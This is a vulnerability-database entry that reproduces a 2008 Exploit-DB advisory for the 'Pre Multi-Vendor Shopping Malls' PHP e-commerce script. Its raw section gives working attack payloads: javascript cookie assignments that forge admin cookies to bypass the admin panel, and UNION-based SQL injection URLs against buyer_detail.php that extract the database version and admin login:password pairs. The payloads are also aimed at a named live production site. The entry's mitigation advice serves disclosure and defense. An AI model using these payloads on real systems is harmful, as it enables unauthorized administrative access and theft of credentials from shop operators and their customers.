Pre Multi-Vendor Shopping Malls Multiple Vulnerabilities

vendor:

Pre Multi-Vendor Shopping Malls

by:

G4N0K

8.8

CVSS

HIGH

Insecure Cookie Handling, SQL Injection

79, 89

CWE

Product Name: Pre Multi-Vendor Shopping Malls

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Pre Multi-Vendor Shopping Malls Multiple Vulnerabilities

Pre Multi-Vendor Shopping Malls is vulnerable to insecure cookie handling and SQL injection. An attacker can inject malicious code into the cookie and gain access to the admin panel. An attacker can also inject malicious SQL code into the buyer_detail.php page to gain access to the admin credentials.

Mitigation:

Ensure that all user input is properly sanitized and validated before being used in SQL queries. Use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Pre Multi-Vendor Shopping Malls Multiple Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:         	Pre Multi-Vendor Shopping Malls | Preproject MCart | PRE MULTI-VENDOR E-COMMERCE SOLUTION
[~] Language :         	PHP
[~] Website[main]:     	http://www.preproject.com
[~] Website[script]:    http://www.preproject.com/mcart.asp
[~] Type :             	Commercial
[~] Report-Date :     	05/11/2008
[~] Founder :			G4N0K <mail.ganok[at]gmail.com>

===============================================================================

===[ Insecure Cookie Handling ]===
admin-panel: http://localhost/[path]/SiteAdmin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";

===[ LIVE ]===
admin-panel: http://preproject.com/prebay/siteadmin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";



===[ SQL ]===
[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
[!] http://localhost/[path]/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--



===[ SQL-LIVE ]===
[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(user(),0x3a,version()),4,5--&cid=26
[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=-111+UNION+ALL+SELECT+1,2,concat(login,0x3a,password),4,5+FROM+admin--&cid=26
[+] http://preproject.com/prebay/buyer_detail.php?prodid=350&custid=240&sid=111&cid=-26+UNION+ALL+SELECT+1,concat(login,0x3a,password),3,4+FROM+admin--


===[ Greetz ]===
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-05]